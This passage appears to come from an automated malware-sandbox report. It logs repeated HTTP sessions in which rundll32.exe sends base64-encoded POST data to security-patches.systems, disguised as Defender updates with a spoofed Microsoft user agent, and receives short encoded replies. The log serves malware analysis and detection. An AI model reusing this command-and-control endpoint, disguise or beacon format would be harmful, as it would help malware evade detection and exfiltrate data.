                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:26.924909115 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:26 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.449753185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:27.185223103 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:28.638133049 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:28 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.449754185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:28.904866934 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:30.350822926 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:30 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.449755185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:30.621342897 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:32.059113979 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:31 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.449756185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:32.345726013 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:33.778940916 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:33 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.449757185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:34.041434050 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:35.515829086 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:35 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              18192.168.2.449760185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:35.777730942 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:37.388056040 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:36 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              19192.168.2.449761185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:37.654063940 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:39.109209061 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:38 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              20192.168.2.449767185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:39.374171972 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:40.856287003 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:40 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.449773185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:41.132041931 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:42.594734907 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:42 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.449779185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:42.857764959 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:44.310071945 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:43 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.449782185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:44.597064018 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
                                              Host: security-patches.systems
                                              Content-Length: 245
                                              Content-Type: application/x-www-form-urlencoded
                                              Accept-Language: fr-CA
                                              Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 57 6c 6f 4e 45 56 32 56 6d 70 54 4d 56 4a 46 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                              Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaWloNEV2VmpTMVJFPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                              Dec 6, 2024 22:20:46.058696032 CET218INHTTP/1.1 200 OK
                                              Date: Fri, 06 Dec 2024 21:20:45 GMT
                                              Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                              X-Powered-By: PHP/8.2.12
                                              Content-Length: 20
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                              Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.449787185.234.216.17544431908C:\Windows\SysWOW64\rundll32.exe
                                              TimestampBytes transferredDirectionData
                                              Dec 6, 2024 22:20:46.327305079 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                              User-Agent: Microsoft-WNS/10.0
